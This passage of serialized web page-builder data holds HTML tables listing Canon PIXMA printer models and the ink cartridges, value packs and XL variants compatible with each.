width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td 